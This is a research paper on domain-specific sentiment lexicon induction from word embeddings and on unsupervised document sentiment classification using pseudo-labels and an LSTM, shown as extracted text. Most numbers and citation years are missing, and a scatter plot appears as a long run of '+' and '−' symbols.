the second stage of our approach out- performs the state-of-the-art unsupervised method for sentiment lexicon induction (hamilton et al., ), which is the most closely related work (see section ). the key to the superior performance of our method compared with theirs is the insight gained from our first stage that positive and neg- ative sentiment words are largely clustered in the domain-specific vector space but these two clus- ters have a non-negligible overlap, therefore semi- supervised/transductive learning algorithms could be easily misled by the examples in the overlap and would actually not work as well as simple super- vised classification algorithms. overall, the docu- ment sentiment classifier resulting from our nearly- unsupervised approach does not require any labeled document to be trained, and it can outperform the state-of-the-art unsupervised method for document sentiment classification (eisenstein, ). the source code for our implemented system and the datasets for our experiments are open to the research community . the rest of this paper is organized as follows. in section , we review previous studies on this topic. in sections to , we describe the three main stages of our approach respectively. in section , we draw conclusions and discuss future work. related work most of the early sentiment analysis systems took lexicon-based approaches to document sentiment classification which rely on pre-compiled sentiment lexicons (owsley et al., ). various methods have been proposed to automatically produce such sentiment lexicons (hu and liu, ; ding et al., ). later, the focus of research shifted to learning-based approaches (pang et al., ; pang and lee, ), as supervised learning algorithms usually deliver a much higher accuracy in senti- ment classification than pure lexicon-based meth- ods. however, lexicons have not completely lost their attractiveness: they are usually easier to un- derstand and to maintain by non-experts, and they can also be integrated into learning-based sentiment classifiers (mudinas et al., ; eisenstein, ). https://goo.gl/ k pbe unlabeled training documents word embeddings sentiment lexicon pseudo-labeled training documents probabilistic word classifier sentiment seeds lexicon-based sentiment classifier learning-based sentiment classifier unlabeled test documents classified test documents figure : our nearly-unsupervised approach to domain-specific sentiment classification. the lexicon-based sentiment classifier used in our experiments is a publicly-available system called psenti (mudinas et al., ). in addition to a customizable sentiment lexicon, it also uses shallow nlp techniques like part-of-speech (pos) tagging and the detection of sentiment inverters and other modifiers (intensifying and diminishing adverbs). the introduction of modern word embedding techniques like word vec (mikolov et al., ) and glove (pennington et al., ) have opened the possibility of new sentiment analysis methods. given a large unlabeled corpus, such techniques can learn from word co-occurrence information and pro- duce a vector space of hundreds of dimensions, with each word being assigned a corresponding vector. the resulting vector space helps in understanding the semantic relationships between words and al- lows grouping of words based on their linguistic similarities. recently rothe et al. ( ) proposed the densifier method that can reduce the dimen- sionality of word embeddings without losing seman- tic information and explored its application in vari- ous domains. 
for the semeval- task (rosenthal et al., ), densifier performed slightly worse compared to word vec, though its training time was shorter by a factor of . in fact, previous studies such as (rothe et al., ; cliche, ) suggest that word vec usually provides the best word em- beddings for sentiment analysis tasks. in their recent work, hamilton et al. ( ) https://goo.gl/pj xaq demonstrated that by starting from a small set of seed words and conducting label propagation over the lexical graph derived from the pairwise prox- imities of word embeddings, they could induce a domain-specific sentiment lexicon comparable to a hand-curated one. intuitively, the success of their method named sentprop requires a relatively clear separation between sentiment words of opposite po- larity in the vector space which, as we will show later, is not very realistic. moreover, they have fo- cused on the induction of sentiment lexicons alone, while we are trying to design an end-to-end pipeline that can turn unlabeled documents in a new do- main directly to their sentiment classifications, with domain-specific sentiment lexicon induction as a key component. recent advances in deep learning (lecun et al., ) has elevated sentiment analysis to new perfor- mance levels (kim, ; dai and le, ; hong and fang, ). as reported by dai and le ( ), the long short-term memory (lstm) (hochreiter and schmidhuber, ) recurrent neural network (rnn) can reach or surpass the performance lev- els of all previous baselines for sentiment classifi- cation of documents. one of the many appeals of ltsm is that it can connect previous information to the current context and allow seamless integration of pre-trained word embeddings as the first (projec- tion) layer of the neural network. moreover, rad- ford et al. ( ) discovered the “sentiment unit”, the single unit which can learn the perfect represen- tation of sentiment, in a multiplicative lstm with units, despite the fact that the lstm was only trained for a completely different purpose — to pre- dict the next character in the text of amazon re- views. our results are in line with those findings and confirmed the superiority of lstm in building document-level sentiment classifiers. zhang et al. ( ) tried to address the low re- call problem of lexicon-based methods for twitter sentiment classification via training a learning-based sentiment classifier using the noisy labels generated by a lexicon-based sentiment classifier (ding et al., ). although the basic idea of their work is similar to what we do in the third stage of our ap- proach (see section ), there exist several notable differences. first, they adopted a single general- purpose sentiment lexicon provided by ding et al. ( ) and used it for all domains, while we would induce a different lexicon for each different domain. consequently, their method could have a relatively large variance in the document sentiment classifica- tion performance because of the domain mismatch (e.g., f = . for the “tangled” tweets and f = . for the “obama” tweets), whereas our approach would perform quite consistently over dif- ferent domains. second, they would need to strip out all the previously-known opinion words in their single general-purpose sentiment lexicon from the training documents in order to prevent the training bias and force their document sentiment classifier to exploit domain-specific features, but doing this would obviously lose the very valuable sentiment signals carried by those opinion words. 
in contrast, we would be able to utilize all terms in the training documents, including those opinion words that ap- peared in our automatically induced domain-specific lexicons, as features, when building our document sentiment classifiers. third, they designed their method specifically for twitter sentiment classifica- tion, while our approach would work for not only short texts such as tweets (see section . ) but also long texts such as customer reviews (see sec- tion . ). fourth, they had to use an intermediate step to identify additional opinionated tweets (ac- cording to the opinion indicators extracted through the χ test on the results of their lexicon-based sen- timent classifier) in order to handle the neutral class, but we would not require that time-consuming step as we would use the calibrated probabilistic outputs of our document sentiment classifier to detect the neutral class (see section . ). domain-specific sentiment word embedding our approach to domain-specific document-level sentiment classification is built on top of word em- beddings — distributed word representations (vec- tors) that could be learned from an unlabeled corpus to encode the semantic similarities between words (goldberg, ). in this section, we investigate how the embed- dings of sentiment words for a particular domain would look like in the domain-specific vector space. to ensure a fair comparison with the state-of-the- art sentiment lexicon induction technique sentprop (hamilton et al., ) later in section , we adopt the same publicly-available pre-trained word em- beddings for the following three domains together with the corresponding sets of sentiment words (i.e., sentiment lexicons). • standard-english. we use the the google news word embeddings and the ‘general inquirer’ lex- icon (stone et al., ) with the sentiment polar- ity scores collected by warriner et al. ( ). • twitter. we use the word embeddings constructed by rothe et al. ( ) and the sentiment lexicon from the semeval- task e (rosenthal et al., ). • finance. we use the word embeddings learned us- ing an svd-based method (manning et al., ) from a collection of “ -k” financial reports (lee et al., ) and the finance sentiment lexicon hand-crafted by hamilton et al. ( ). note that the above three sentiment lexicons would be used for both the inspection of sentiment word distributions in this section and the evaluation of sentiment lexicon induction later in the next sec- tion. furthermore, to facilitate a fair compari- son with the state-of-the-art unsupervised document sentiment classification technique problex-dcm (eisenstein, ) later in section , we also adopt the following two document collections which they have used. https://goo.gl/bfky n https://goo.gl/ r l https://goo.gl/ ntr v https://goo.gl/qr f • imdb. we use k movie reviews in english from imdb (maas et al., ) with k labeled training documents. • amazon. we use about k product reviews in english across four product categories from ama- zon (blitzer et al., ; mcauley and leskovec, ) with k labeled training documents. the word embeddings for the above two domains were trained by us on the respective corpora us- ing word vec (mikolov et al., ) which employs a two-layer neural network and is by far the most widely used word embedding technique. specifi- cally, we ran word vec with skip-gram of a five- word window to construct word vectors of di- mensions, as recommended by previous studies . 
the sentiment lexicon made by liu ( ) is consis- tently one of the best for analyzing reviews (ribeiro et al., ), so it is used for both of those domains. drawing an analogy to the well-known cluster hy- pothesis in information retrieval (ir) (manning et al., ), here we put forward the cluster hypothe- sis for sentiment analysis: words in the same cluster behave similarly with respect to sentiment polarity in a specific domain. that is to say, we expect pos- itive and negative sentiment words to form distinct clusters, given that they have been represented in an appropriate vector space. to verify this hypothesis, it would be useful to visualize the high-dimensional sentiment word vectors in a d plane. we have tried a number of dimensionality reduction tech- niques including the t-distributed stochastic neigh- bor embedding (t-sne) (van der maaten and hin- ton, ), but found that simply using the clas- sic principle component analysis (pca) (bishop, ) works very well for this purpose. we have found that in general, the above cluster hypothesis holds for word embeddings within a spe- cific domain. fig. a shows that in the standard- english domain, the sentiment words with opposite polarities would form two distinct clusters. how- ever, it can also be seen that those two clusters would overlap with each other. that is because each word carries not only a sentiment value but also its linguis- tic and semantic information. zooming into one of the word vector space regions (fig. b) can help us understand why sentiment words with different po- https://goo.gl/syadej − − + + − − − − + + + + − − − − − + − − + − − − + − + − + − − − + + + + − + − − − + + + + − + + − + + − + − − + −− − + − − − + + − − + + − + − + − + − + − + + + − + + − + − + − − + − − − + + − − − − − + − − − − − + − − − + − + + − + + + + − + + − + − − − − − + + + + + + − − − − + − − − + − − − − + − + − −− − + + − + + + − + − + − − − − + − − + + + + − − + − + − − − + + + + − − − − − + − + + + − − + − − − − − − + + − − + − − + + − − −+ + −− − + − − + − − + − − + − − + + + + − − − − − − − + − −+ − − − − −+ − − − + − + − + + + + + + − − − − − + − − − − + + + − − + − + + − − − + + + − − + + + − − − − − + + + + + − + + − − − + + − −+ − − − − + − − + − + − − + − + − − + − − − − − − + − − − − − + − − − − − − − − − + − + −+ + − − − − + − − + + + − − + − − + + + − − − + − − + − + + + + − + + + + + − − − − + − + + + − −+ + − − − + − + − − − + + − + − + + + − − − − − − + − + − − − − − + − − − − − − − + − + − + + − −− − − − − − − + − + − + − − + + − − − − − + − − + + + − + + − − − + + − + − − − − − − − − − − − − − − − + − − + − + − + − + + + − − − − − − + − − − − − − − − − − − + − − − + + − − − + − − − −+ − + + + − − − + −+ − − − + − + − − + − + − − − − −+ + − + + − + − − − + − − + + − + + − − − − − − + − − − − + + − + + + − − + ++ + − + + − − + + − + + − − − + + − + − − − + + − − − − + − + − − − + − + − + − − − + + − − + − + + − + + − − + + + + − + − + − − − + − + − + − − − − − + + + + − + − + − + + − − + + − + + − − + − − + − − − − ++ − − + − − − − + − + + + − + + − + − + + + − − − − − − + − − − − − − − − − − + − + − + − − + − − + − − + + − + − + − − + − −− − + − + − − + − + − − + − + − − − + − − + − − − − − + + + + − + − − − + − − + − − + −− − − − − − − − + − + − − − − − − − − + − + − + + + − + − − − + + − − − − − + − + − + + − − − − − − − − + + − − − + − − − + − − − + − + − + − − − − − − + + + − + − − + − + + + − + − − − + + + − + − − + − − − − + + − − + − − − − − − − + − + − − − + − + + − + − − − − + − − − − + − + + − + + + − + − − − − − − − 
+ − + + + − + + + − − + − − − − + − − − − + − + − − − + − + − + + − + + − + − − − − + + − − − − + − + − − − + + + − − − + + − − + − − − − −+ − + + − − + − − − − − − − − − − + − − − + − − + − + − −+ − + − − − − − − − + + + + + + + − + − − − − − + − − + − + − − − + − − + + + − − + − + + − − − − − − − − + − + − − − − − − − + − − + − + + − −+ + −− + − − − − − − − − − − + − + − + − + − − + − − − − − − − + − + + − + − − + + − − − − − − − − + − + − − + − − − − − + + − − + + + − − − + − − + − − + + − + + − − + − + + + + − + − − − − + + − + − − + − + + − − + + − + − − − − + − − + + − − + − − − − + − − − + − + − − + − − −+ + − + − − − + − + − + − − + − − + − − − + −+ + + + − − + − + − + + − + − − − + + − + − + − + − − − − + − + − + + − + − + + − − − + + − + − − − − − − − − + − + − + + + − − − − − + − − + − − − − + − − − − + + + − − − − + − − − − − − − + + − − − − − − − − + − − − − + − + + + − − + − + + + + + − − + − − − − + − + + + − − + − − − + + − + − + − + − − − − − + − − − − − − + + − + + + − − − − − − + − + − + + + + + − − − − − − + − − + + + + + − + − − − + + + − − + + + − − − − + − + − + ++ − ++ − + − − − + − − − − − − − + − − − − − + −− + − − − + − − − − + − − − − − + − − + − + + + + + + − + − − − − − + − −− ++ ++ + − + − − + − − − + + − + − − + − + − − − − − + − + − − − − + + − + − − + − − − − − + + + − − − − + − + + + − − − + + − − + − − + − − + + + + − − + − + − − + + − − + + + − + − − − − − + − − + + − − − + + − − + − + − −+ + + − + − − + − − − + − − + + − − + − + + − − − − −− + − − + − − + − + − − − + − + − + − + + − + − + + + + + + − + − − − + + + − + − − − − + − − − − + − + − + + − + + + − − + − + − − + + + − − + + + + + − + − − − + − − + − + − + + + + − − − − − − + − + + − − + − − + + − + + − + − − + − + + + − + − − − + − − + + − − − − − − + − − + − − + − + − − − − + + + + + + − − + − − + − + − + − − − − − + − ++ − − + + − − − + + + − − − − − + − + − −+ + − − − − − + − + − − + + + − − + − − + − − + − + − + − + − + − − + + + + + + + − − + − + − − − − + − − + + − − − − + − − + + − − ++ − − − − − + + −− − − + + − + − − + + − − + − + − − − + + − + − − + + − + + − − + + −− − − − + −− − − + + − − − + − − + − + − − + − − − + − − + − + + − − + + − − − − + − − + − − + − + + − − + −− − − − + − − − − − − − − + − + + − + + + + − − − + − − − − − − − − −+ + + − − + − + − − − − − − −+ + −− − −− − + − + − + − − − − − − + − − ++ + + − + − − − + − − + + + − − + − − − − + − − + + + + − − − − − − + − + + − − − + − + − + − − − + − − + + + − + − − − − − − + ++ + − − − + + − + + − − − − − + − − − + − − + − − − − + − − − + + − + + + + − + + + + − − − − − + − + − − + − − − + + − − − − ++ − + − + − − + − − − + − − − − + − − + + + + − − − + + − + − − − + − − + − − + − − + + + −+ − + − + − − − + + + + − − − + + − − − + + −− − + + − − − − + − + − − − + − + + − + − + − + + + −− − − + + + − − + − + − − − − + − − − + − + − − − + − − − (a) the global vector space showing two clusters. (b) a local region of the vector space zoomed in. figure : visualisation of the sentiment words in the standard-english domain. larities could be grouped together: ‘hail’, ‘stormy’ and ‘sunny’ are linguistically similar as they all de- scribe weather conditions, yet they convey very dif- ferent sentiment values. moreover, as described by (plutchik, ), sentiment could be grouped into multiple dimensions such as joy–sadness, anger– fear, trust–disgust and anticipation–surprise. putting that aside, certain sentiment words can be classified sometimes as positive and sometimes as negative, depending on the context. 
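a minimal way to reproduce this kind of 2d inspection is sketched below, assuming pre-trained vectors in gensim's keyedvectors format and a small polarity-labelled lexicon; the file name, the example words and the use of matplotlib are illustrative choices, not the authors' exact plotting pipeline.

```python
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from gensim.models import KeyedVectors

# illustrative inputs: a domain embedding file and a {word: "+"/"-"} lexicon
vectors = KeyedVectors.load_word2vec_format("domain_vectors.bin", binary=True)
lexicon = {"excellent": "+", "lovely": "+", "happy": "+",
           "horrible": "-", "poor": "-", "unhappy": "-"}

words = [w for w in lexicon if w in vectors]
X = np.vstack([vectors[w] for w in words])

# project the high-dimensional word vectors onto a 2d plane with pca
xy = PCA(n_components=2).fit_transform(X)

for (px, py), w in zip(xy, words):
    marker = "+" if lexicon[w] == "+" else "_"
    plt.scatter(px, py, marker=marker, c="k")
plt.title("sentiment words projected with pca")
plt.show()
```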
the reasons above lead to the phenomenon that many sentiment words are located in the overlapping, noisy region between the two clusters in the domain-specific vector space. on visual inspection of the finance (fig. a) sentiment words and imdb (fig. a) sentiment words in their respective vector spaces, we can see that positive and negative words form distinct clusters which are largely separable. however, if we consider finance sentiment words in the imdb vector space (see fig. b), positive and negative words are mixed together and cannot be separated easily.

figure : sentiment words of finance in the same/different domain vector space. (a) in the finance (same domain) vector space. (b) in the imdb (different domain) vector space.

figure : sentiment words about movies in the imdb vector space before/after filtering. (a) original/full. (b) filtered.

one may be surprised that positive and negative sentiment words form their respective clusters, because most of the time they could be used in exactly the same context, which might suggest that they would result in similar word embeddings. for example, we could say "the room is good" and also "the room is bad": both are legitimate sentences. the probable reason for the cluster hypothesis to be true is that in reality people tend to use positive sentiment words together much more often than to mix them with negative sentiment words, and vice versa. for example, it is much more common to see sentences like "the room is clean and tidy" than "the room is clean but messy". it is a long-established fact in computational linguistics that words with similar meanings tend to occur near each other (miller and charles, ); sentiment words are no exception (turney, ). moreover, it has been widely observed that online customer reviews are affected by the so-called love-hate self-selection bias: users tend to rate only products which they either like or hate, leading to many more 1-star and 5-star ratings than other (moderate) ratings; if the product is just average or so-so, they probably will not bother to leave reviews. the polarization of online customer reviews would also encourage the clustering of sentiment words into opposite polarities.

domain-specific sentiment lexicon induction

given the word embeddings for a specific domain, we can induce a customized sentiment lexicon from a few typical sentiment words ("seeds") frequently used in that particular domain. such an induced domain-specific sentiment lexicon plays a crucial role in the pipeline towards domain-specific document-level sentiment classification. table shows the seed words for five different domains, which are identical to those used by hamilton et al. ( ) except for the two additional domains imdb and amazon. the induction of a sentiment lexicon can then be formulated as a simple word sentiment classification problem with two classes (positive vs. negative). each word is represented as a vector via domain-specific word embedding; the seed words are labeled with their corresponding classes while all the other words (i.e., "candidates") are unlabeled; the task here is to learn a classifier from the labeled examples first and then apply it to predict the sentiment polarity of each unlabeled candidate word. the probabilistic outputs of such a word sentiment classifier can be regarded as the measure of confidence about the predicted sentiment polarity. in the end, those candidate words with a high probability of being either positive or negative are added to the sentiment lexicon. the final induced sentiment lexicon includes both the seed words and the selected candidate words.
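a compact sketch of this induction step is given below, using scikit-learn's logistic regression as the simple linear model; the seed lists, candidate list, embedding lookup (`vectors`) and the 0.9 confidence threshold are illustrative stand-ins rather than the exact configuration used in the paper.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# assumed to exist: `vectors`, a word -> embedding lookup (e.g. gensim KeyedVectors)
pos_seeds = ["good", "excellent", "perfect", "happy", "amazing"]
neg_seeds = ["bad", "horrible", "poor", "disappointing", "boring"]
candidates = ["gripping", "bland", "unforgettable", "lifeless"]   # e.g. frequent adjectives

X_train = np.vstack([vectors[w] for w in pos_seeds + neg_seeds])
y_train = np.array([1] * len(pos_seeds) + [0] * len(neg_seeds))

clf = LogisticRegression(C=1.0, max_iter=1000).fit(X_train, y_train)

induced = {w: 1.0 for w in pos_seeds}
induced.update({w: -1.0 for w in neg_seeds})

# keep only the candidates the classifier is confident about (threshold is illustrative)
probs = clf.predict_proba(np.vstack([vectors[w] for w in candidates]))[:, 1]
for w, p_pos in zip(candidates, probs):
    if p_pos >= 0.9:
        induced[w] = p_pos
    elif p_pos <= 0.1:
        induced[w] = -(1.0 - p_pos)

print(induced)   # final lexicon: the seeds plus the confidently-classified candidates
```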
as pointed out by mudinas et al. ( ), if we simply consider all words from the given corpus as candidate words, the above described word sentiment classifier tends to assign sentiment values not only to the actual sentiment words but also to their associated product features or, more generally, the aspects of the expressed view. for example, if a lot of customers do not like the weight of a product, the word sentiment classifier may assign strong negative sentiment to "weight", yet this is not stable: the sentiment polarity of "weight" may be different when a new version of the product is released or the customer population has changed, and furthermore it probably does not apply to other products. to avoid this potential issue, it would be necessary to consider only a high-quality list of candidate words which are likely to be genuine sentiment words. such a list of candidate words could be obtained directly from general-purpose sentiment lexicons. it is also possible to perform nlp on the target domain corpus and extract frequently-occurring adjectives or other typical sentiment indicators like emoticons as candidate words, which is beyond the scope of this paper. to examine the effectiveness of different machine learning algorithms for building such domain-specific word sentiment classifiers, we attempt to recreate known sentiment lexicons in three domains: standard-english, twitter, and finance (see section ), in the same way as hamilton et al. ( ) did. put differently, for the purpose of evaluation, we would just use a known sentiment lexicon in the corresponding domain as the list of candidate words and see how different machine learning algorithms would classify those candidate words based on their domain-specific word embeddings. for those lexicons with ternary sentiment classification (positive vs. neutral vs. negative), the class-mass normalization method (zhu et al., ) used by hamilton et al. ( ) has been applied here to identify the neutral category. the quality of each induced lexicon for a specific domain is evaluated by comparing it with its corresponding known lexicon as the ground-truth, according to the same performance metrics as in (hamilton et al., ): area under the receiver-operating-characteristic (roc) curve (auc) for the binary classifications (ignoring the neutral class, as is common in previous work) and kendall's τ rank correlation coefficient with continuous human-annotated polarity scores. note that kendall's τ is not suitable for the finance domain, as its known sentiment lexicon is only binary. therefore, our experimental setting and performance measures are all identical to those of hamilton et al. ( ), which ensures the validity of the empirical comparison between our approach and theirs.
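this evaluation protocol can be sketched as follows, assuming the known lexicon provides a ternary label and a continuous human-annotated score for each word; the dictionary-based data layout is our own assumption, not that of the original code.

from scipy.stats import kendalltau
from sklearn.metrics import roc_auc_score

def evaluate_induction(p_pos, gold_label, gold_score):
    """p_pos: {word: P(positive)}; gold_label: {word: -1/0/+1}; gold_score: {word: float}."""
    # auc on the binary task, ignoring words labelled neutral in the known lexicon
    binary = [w for w in p_pos if gold_label.get(w, 0) != 0]
    auc = roc_auc_score([1 if gold_label[w] > 0 else 0 for w in binary],
                        [p_pos[w] for w in binary])
    # kendall's tau between predicted scores and human-annotated polarity scores
    ranked = [w for w in p_pos if w in gold_score]
    tau, _ = kendalltau([p_pos[w] for w in ranked],
                        [gold_score[w] for w in ranked])
    return auc, tau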
table : the "seeds" for domain-specific sentiment lexicon induction.
standard-english
  positive: good, lovely, excellent, fortunate, pleasant, delightful, perfect, loved, love, happy
  negative: bad, horrible, poor, unfortunate, unpleasant, disgusting, evil, hated, hate, unhappy
twitter
  positive: love, loved, loves, awesome, nice, amazing, best, fantastic, correct, happy
  negative: hate, hated, hates, terrible, nasty, awful, worst, horrible, wrong, sad
finance
  positive: successful, excellent, profit, beneficial, improving, improved, success, gains, positive
  negative: negligent, loss, volatile, wrong, losses, damages, bad, litigation, failure, down, negative
imdb
  positive: good, excellent, perfect, happy, interesting, amazing, unforgettable, genius, gifted, incredible
  negative: bad, bland, horrible, disgusting, poor, banal, shallow, disappointed, disappointing, lifeless, simplistic, bore
amazon
  positive: imdb domain seeds (as above) plus positive, fortunate, correct, nice
  negative: imdb domain seeds (as above) plus negative, unfortunate, wrong, terrible, inferior

in table , we compare a number of typical supervised and semi-supervised/transductive learning algorithms for word sentiment classification in the context of domain-specific sentiment lexicon induction:
• knn — k nearest neighbors (hastie et al., ),
• lr — logistic regression (hastie et al., ),
• svmlin — support vector machine with the linear kernel (joachims, ),
• svmrbf — support vector machine with the non-linear rbf kernel (joachims, ),
• tsvm — transductive support vector machine (joachims, ),
• s vm — semi-supervised support vector machine (gieseke et al., ),
• cple — contrastive pessimistic likelihood estimation (loog, ),
• sgt — spectral graph transducer (joachims, ),
• sentprop — a label propagation based classification method proposed for the socialsent system (hamilton et al., ).
the suitable parameter values of the above learning algorithms (such as the c for svm) are found via grid search with cross-validation, and the probabilistic outputs are given by platt scaling (platt, ) if they are not provided by the original learning algorithm. the experimental results shown in table demonstrate that in almost every single domain, simple linear model based supervised learning algorithms (lr and svmlin) can achieve the optimal or near-optimal accuracy for the sentiment lexicon induction task, and they outperform the state-of-the-art sentiment lexicon induction method sentprop (hamilton et al., ) by a large margin. the performance improvements are statistically significant (p-value < . ) according to the sign test. there does not seem to be any benefit of utilizing non-linear models (knn and svmrbf) or semi-supervised/transductive learning algorithms (tsvm, s vm, cple, sgt, and sentprop). the qualitative analysis of the sentiment lexicons induced by different methods shows that they differ only on those borderline, ambiguous words (such as "soft") residing in the noisy overlapping region between two clusters in the vector space (see section ). in particular, sentprop is based on label propagation over the lexical graph of words, so it could be easily misled by noisy borderline words when sentiment clusters have considerable overlap with each other, kind of "over-fitting" (bishop, ). furthermore, according to our experiments on the same machine, those simple linear models are + times faster than sentprop.
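as an illustration of this model-selection setup, the following sketch tunes the c parameter of a linear svm by cross-validated grid search on the seeds and adds platt-scaled probability outputs; the parameter grid and fold counts are illustrative choices, not the settings used in the experiments.

from sklearn.svm import LinearSVC
from sklearn.model_selection import GridSearchCV
from sklearn.calibration import CalibratedClassifierCV

def fit_linear_svm_with_probs(x_seeds, y_seeds):
    # cross-validated grid search over the svm cost parameter C
    grid = GridSearchCV(LinearSVC(), {"C": [0.01, 0.1, 1, 10, 100]}, cv=3)
    grid.fit(x_seeds, y_seeds)
    # sigmoid (Platt) calibration adds predict_proba to the linear svm
    calibrated = CalibratedClassifierCV(LinearSVC(C=grid.best_params_["C"]),
                                        method="sigmoid", cv=3)
    return calibrated.fit(x_seeds, y_seeds)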
the speed difference is mainly due to the fact that supervised learning algorithms only need to train on a small number of labeled words ("seeds" in our context) while semi-supervised/transductive learning algorithms need to train on not only a small number of labeled words but also a large number of unlabeled words. it has also been observed in our experiments that there is a typical precision/recall trade-off (manning et al., ) for the automatic induction of semantic lexicons. assuming that the classified candidate words are added to the lexicon in the descending order of their probabilities (of being either positive or negative), the induced lexicon will be noisier and noisier when it becomes bigger and bigger.

table : comparing the induced lexicons with their corresponding known lexicons (ground-truth) according to the ranking of sentiment words measured by auc and kendall's τ. rows: standard-english, twitter, and finance for auc; standard-english and twitter for τ. columns: knn, lr, svmlin, svmrbf, tsvm, s vm, cple, sgt, and sentprop.

figure : how the accuracy and size of an induced lexicon are influenced by the cut-off probability threshold (accuracy and number of words vs. cutoff probability).

fig. shows that imposing a higher cut-off probability threshold (for candidate words to enter the induced lexicon) would decrease the size of the induced lexicon but increase its quality (accuracy). on one hand, the induced lexicon needs to contain a sufficient number of sentiment words, especially when detecting sentiment from short texts, as a lexicon-based method cannot reasonably classify documents with none or too few sentiment words. on the other hand, the noise (misclassified sentiment words) in the induced lexicon would obviously have a detrimental impact on the accuracy of the document sentiment classifier built on top of it. contrary to most previous work like that from qiu et al. ( ), which tries to expand the sentiment lexicon as much as possible and thus maintain a high recall, we would put more emphasis on the precision and keep a tight control of the lexicon size. for us, having a small sentiment lexicon is affordable, because our proposed approach to document sentiment classification will be able to mitigate the low recall problem of lexicon-based methods by combining them with learning-based methods, which we shall talk about next.

domain-specific sentiment classification of documents

a domain-specific sentiment lexicon, automatically induced using the above technique, provides a solid basis for building domain-specific document sentiment classifiers. for the experiments here, we would use a list of candidate words constructed by merging two well-known general-purpose sentiment lexicons that are both publicly available: the 'general inquirer' (stone et al., ) and the sentiment lexicon from liu ( ). this set of candidate words is itself a combined, general-purpose sentiment lexicon, so we name it the gi+bl lexicon. moreover, we would set the cut-off probability threshold to a generally good value . in our sentiment lexicon induction algorithm. comparing the imdb vector space including all the candidate words (fig. a) with that including only the high-probability candidate words (fig. b), it is obvious that the positive and negative sentiment clusters become more clearly separated in the latter.
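the trade-off between lexicon size and quality can be examined with a simple sweep over the cut-off probability threshold, sketched below under the assumption that a reference lexicon is available for measuring accuracy; the threshold grid is an arbitrary choice.

import numpy as np

def sweep_cutoff(p_pos, reference, thresholds=np.arange(0.5, 1.0, 0.05)):
    """p_pos: {word: P(positive)}; reference: {word: +1 or -1}."""
    for t in thresholds:
        # keep only candidates whose predicted polarity is confident at this cutoff
        kept = {w: (+1 if p >= t else -1)
                for w, p in p_pos.items() if p >= t or p <= 1 - t}
        correct = sum(reference.get(w) == pol for w, pol in kept.items())
        accuracy = correct / len(kept) if kept else float("nan")
        print(f"cutoff={t:.2f}  size={len(kept)}  accuracy={accuracy:.3f}")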
the induced sentiment lexicon on its own could be applied directly in a lexicon-based method for sentiment classification of documents, and a reasonably good performance could be achieved, as we will show later in table . however, most of the time, lexicon-based sentiment classifiers are not as effective as learning-based sentiment classifiers. one reason is that the former tend to suffer from poor recall. for example, with a limited-size sentiment lexicon, lexicon-based methods would often fail to detect the sentiment present in short texts, e.g., from twitter, due to the lexical gap. given the induced sentiment lexicon, we propose to use a lexicon-based sentiment classifier to classify unlabeled documents, and then use those classified documents containing at least three sentiment words as pseudo-labeled documents for the later training of a learning-based sentiment classifier. the condition of "at least three sentiment words" is to ensure that only reliably classified documents would be further utilised as training examples.

. sentiment classification of long texts

first, we try the induced sentiment lexicons in the lexicon-based sentiment classifier psenti (mudinas et al., ) to see how good they are. given a sentiment lexicon, psenti is able to perform not only binary sentiment classification but also ordinal sentiment classification on a five-point scale. to measure the binary classification performance, we use both micro-averaged f (mif ) and macro-averaged f (maf ), which are commonly used in text categorization (yang and liu, ). to measure the five-point scale classification performance, we use both cohen's κ coefficient (manning et al., ) and also root-mean-square error (rmse) (bishop, ). as the baseline, we use a combined general-purpose sentiment lexicon, gi+bl, mentioned previously in section . as we can see from the results shown in table , using the induced sentiment lexicon for the target domain would make the lexicon-based sentiment classifier psenti perform better than simply employing an existing general-purpose sentiment lexicon. moreover, using the sentiment lexicons induced from the same domain would lead to a much better performance than using the sentiment lexicons induced from a different domain. second, to evaluate the proposed two-phase bootstrapping method, we make empirical comparisons on the imdb and amazon datasets using a number of representative methods for document sentiment classification:
• psenti — a concept-level lexicon-based sentiment classifier (mudinas et al., ),
• problex-dcm — a probabilistic lexicon-based classification using the dirichlet compound multinomial (dcm) likelihood to reduce effective counts for repeated words (eisenstein, ),
• svmlin — support vector machine with linear kernel (joachims, ),
• cnn — convolutional neural network (kim, ),
• lstm — long short-term memory, a recurrent neural network (rnn) that can remember values over arbitrary time intervals (hochreiter and schmidhuber, ; dai and le, ).
to apply the deep learning algorithms cnn and lstm, which have a word embedding projection layer, we fix the review size to words, truncating reviews longer than that and padding reviews shorter than that with null values. as pointed out by greff et al. ( ), the hidden layer size is an important hyperparameter of lstm: usually the larger the network, the better the performance, but the longer the training time.
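a minimal keras sketch of such a model is shown below: documents are padded or truncated to a fixed length, projected through an embedding layer, and fed to an lstm with dropout; the vocabulary size, embedding dimension, sequence length, number of units, and dropout rate are placeholder values rather than the settings reported in this section.

from tensorflow.keras import layers, models
from tensorflow.keras.preprocessing.sequence import pad_sequences

MAX_LEN, VOCAB, EMB_DIM = 500, 20000, 100   # placeholder sizes

def build_lstm(units=128, dropout_rate=0.5):
    model = models.Sequential([
        layers.Embedding(VOCAB, EMB_DIM),       # word embedding projection layer
        layers.LSTM(units),                     # recurrent hidden layer
        layers.Dropout(dropout_rate),
        layers.Dense(1, activation="sigmoid"),  # P(positive)
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy",
                  metrics=["accuracy"])
    return model

# sequences: lists of word indices for the pseudo-labeled documents
# x = pad_sequences(sequences, maxlen=MAX_LEN, padding="post", truncating="post")
# model = build_lstm(); model.fit(x, y, epochs=3, batch_size=64)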
in our experiments, we have used an lstm network with units on the hidden layer, which is the capacity that a pc with one nvidia gtx ti gpu can afford, and a dropout (wager et al., ) rate of . , which is the most common setting in the research literature (srivastava et al., ; hong and fang, ; cliche, ). as shown in table , the above described two-phase bootstrapping method has been demonstrated to be beneficial: the learning-based sentiment classifiers trained on pseudo-labeled data are superior to lexicon-based sentiment classifiers, including the state-of-the-art unsupervised sentiment classifier problex-dcm (eisenstein, ). furthermore, the two-phase bootstrapping method is a general framework which can utilize any lexicon-based sentiment classifier to produce pseudo-labeled data. therefore the more sophisticated problex-dcm could also be used instead of psenti in this framework, which is likely to deliver an even higher performance. among the three learning-based sentiment classifiers, lstm achieved the best performance on both datasets, which is consistent with the observations in other studies like dai and le ( ). comparing the lstm-based sentiment classifiers trained on pseudo-labeled and real labeled data, we can also see that using a large number of pseudo-labeled examples could achieve a similar effect as using / ≈ k and / = k real labeled examples for imdb and amazon respectively. this suggests that the unsupervised approach is actually preferable to the supervised approach if there are only a few thousand (or fewer) labeled examples.

